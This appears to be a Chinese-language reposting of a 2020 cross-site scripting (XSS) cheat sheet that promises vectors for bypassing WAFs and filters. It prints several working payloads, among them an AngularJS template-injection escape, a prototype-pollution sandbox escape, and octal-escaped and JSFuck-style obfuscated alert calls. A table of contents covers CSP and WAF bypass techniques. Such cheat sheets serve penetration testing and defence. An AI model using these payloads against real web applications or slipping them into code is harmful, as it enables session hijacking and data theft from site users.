此跨站腳本(XSS)備忘單包含許多向量，可以幫助您繞過WAF和過濾器。您可以通過事件，標簽或瀏覽器選擇向量，每個向量都包含概念證明。

該備忘單會在2020年進行定期更新。

最近更新：2020年6月4日，星期四08:57:33 +0000。

{{constructor.constructor('alert(1)')()}}

{}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()

';top['\141\154\145\162\164']('\130\123\123');//

XSS

XSS

';globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//

中文翻譯地址:

目錄

事件處理程序

沒有用戶互動

需要用戶互動

限制字元

構架

通訊協定

其他有用的屬性

特殊標簽

編碼方式

混淆

客戶端模板注入

VueJS反映

AngularJS沙箱逃逸反映

AngularJS沙箱轉義DOM

AngularJS CSP繞過

無腳本攻擊

多重發光

WAF繞過全局對象

不可能的實驗室

經典向量(XSS加密)

2020跨站腳本[xss]速查表下載地址[pdf]

總結

以上是生活随笔為你收集整理的php xss速查表,2020跨站脚本[xss]速查表 xss cheat sheet的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。